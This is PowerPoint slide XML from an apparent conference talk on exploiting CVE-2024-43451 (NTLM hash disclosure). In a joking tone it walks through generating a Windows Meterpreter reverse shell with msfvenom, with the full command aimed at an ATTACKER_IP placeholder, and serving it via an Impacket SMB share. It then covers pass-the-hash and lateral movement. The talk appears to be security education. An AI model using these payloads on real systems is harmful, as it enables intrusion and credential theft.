            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REVERSE SHELLSSSSSSSS!!!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25C2BD2-AEB8-9E1C-2C36-B9C98B33DF08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Have you ever wanted a reverse shell? Of course you have! Using our brand-new patented technology, even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YOU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, can generate your own payload that can get you access to a randomers machine!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255507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FBC81-47B5-1029-BE95-2D8962E91153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generating Reverse Shells</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F63DB6-A990-3F2D-3CA6-054EF166CECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4822825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The tool ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ is 100% brand-new and definitely not created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rapid7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and released in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nonetheless, you can use this tool to generate all types of malware and shellcode for a multitude of operating systems, including Windows, which is what is required for this attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To generate a reverse shell for a Windows machine, simply run the command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -p windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LHOST=&lt;ATTACKER_IP&gt; LPORT=&lt;LISTENING_PORT&gt; -f exe -o TotallyLegitFile.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(If you are using a 32-bit version of Windows, get a grip Grandad)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136234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1C831-4E0C-710D-8F20-5909C6A4D512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit Modification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{799FE0B9-2CC4-7F2C-7E90-5B3EBD026CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1247250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All that you need to do, is put the reverse shell executable in the directory you created when using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impacket’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> script and modify the exploit script to point to that file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE90010-E205-176D-1CFD-A69BC3676D4B}"/>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l="7457" t="14564" r="7312" b="14199"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2118000" y="3072875"/>
            <a:ext cx="7956000" cy="3420000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1515341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948912-05A8-98E1-67A5-1AD974BAC1BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="628650"/>
            <a:ext cx="10515600" cy="5548313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When the victim interacts with the file, the machine will attempt to authenticate with the attackers SMB server, sending their NTLM hash, as well as downloading and running the reverse shell giving the attacker a foothold into the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59FE41D2-3A6A-7101-B929-9B6E63CE8EF4}"/>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2425" y="2195512"/>
            <a:ext cx="8947150" cy="4591867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="788490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ntro">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3426C949-77D2-0932-CAF9-E0AD239979B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940404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40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C995C-815C-0530-6495-11C107A37F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation or Lateral Movement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6086046D-0EE3-C5BE-38CC-281858837763}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2886075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once the attacker has a reverse shell, they will have access to the machine as the user that ran the program. From here they can attempt to escalate their privileges to Administrator or even SYSTEM depending on how outdated the machine is. Or they can attempt to move laterally to other machines within the network as they have the NTLM hash of the victim which allows them to perform a pass-the-hash attack, or if they can crack the hash, authenticate directly with the password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24C779FB-3A87-FBEE-7F7D-EA40AAF48C49}"/>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662" y="4602162"/>
            <a:ext cx="11390676" cy="1890713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1289050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51DD8-1266-6A9E-C2FB-A70097E9A234}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The End + Shameless Plug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869998CB-EE82-659A-5D3D-D17E8A8CDFDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Full Writeup:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> https://acfirth.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Follow me in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (IMMEDIATELY):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> @acfirthh</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Make sure you star all of my repos)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I suppose I will now accept questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="730072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2594E-934D-EF50-89CC-A4100D4C3463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2235200"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting CVE-2024-43451</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NTLM Hash Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1635079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D16DB-D422-0667-1A0A-DB14DD7B1408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WTF is CVE-2024-43451?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D79CDA-5312-E064-EB0B-9B57883D2D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In November of 2024, a vulnerability research group named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearSky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Cyber Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> were forwarded some emails with an attached zip file that various Ukrainian entities had received.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They dug into the zip files which containing a single PDF and a URL file and discovered that the URL file exploited a zero-day vulnerability allowing attackers to steal NTLM hashes of targeted users.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3137116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444FE-DD68-D310-0BD4-57C467A55045}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So… WTF is NTLM?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA0AE9AE-201B-1D01-762F-C9F65EBEFF60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
